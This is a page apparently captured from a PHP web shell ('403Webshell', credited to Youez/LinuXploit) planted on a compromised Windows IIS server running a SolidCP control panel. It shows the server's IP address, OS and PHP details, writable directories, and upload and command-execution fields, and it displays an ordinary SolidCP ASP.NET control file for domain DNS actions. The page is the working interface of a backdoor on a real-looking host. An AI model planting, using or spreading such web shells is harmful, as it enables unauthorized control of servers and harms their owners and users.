403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /SolidCP/Portal/DesktopModules/SolidCP/UserControls/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /SolidCP/Portal/DesktopModules/SolidCP/UserControls/DomainActions.ascx
<%@ Control Language="C#" AutoEventWireup="true" CodeBehind="DomainActions.ascx.cs" Inherits="SolidCP.Portal.DomainActions" %>
<script type="text/javascript">
    function ShowProgress(btn) {
        var action = $(btn).prev().val();

        if (action === 1) {
            ShowProgressDialog("Enabling Dns...");
        } else if (action == 2) {
            ShowProgressDialog("Disabling Dns...");
        } else if (action == 3) {
            ShowProgressDialog("Creating Preview Domain...");
        } else if (action == 4) {
            ShowProgressDialog("Removing Preview Domain...");
        }
    }
</script>
<asp:UpdatePanel ID="tblActions" runat="server" CssClass="NormalBold" UpdateMode="Conditional" ChildrenAsTriggers="true" >
    <ContentTemplate>
        <div class="input-group">
        <asp:DropDownList ID="ddlDomainActions" runat="server" CssClass="form-control" resourcekey="ddlDomainActions" AutoPostBack="True">
            <asp:ListItem Value="0">Actions</asp:ListItem>
            <asp:ListItem Value="1">EnableDns</asp:ListItem>
            <asp:ListItem Value="2">DisableDns</asp:ListItem>
            <asp:ListItem Value="3">CreatePreviewDomain</asp:ListItem>
            <asp:ListItem Value="4">DeletePreviewDomain</asp:ListItem>
        </asp:DropDownList>
         <div class="input-group-btn">
             <CPCC:StyleButton id="btnApply" CssClass="btn btn-primary" runat="server" OnClick="btnApply_Click" OnClientClick="return ShowProgress(this);"><asp:Label runat="server" meta:resourcekey="btnApplyText"/></CPCC:StyleButton>
         </div>
       </div>
    </ContentTemplate>
    <Triggers>
        <asp:PostBackTrigger ControlID="btnApply" />
    </Triggers>
</asp:UpdatePanel>

Youez - 2016 - github.com/yon3zu
LinuXploit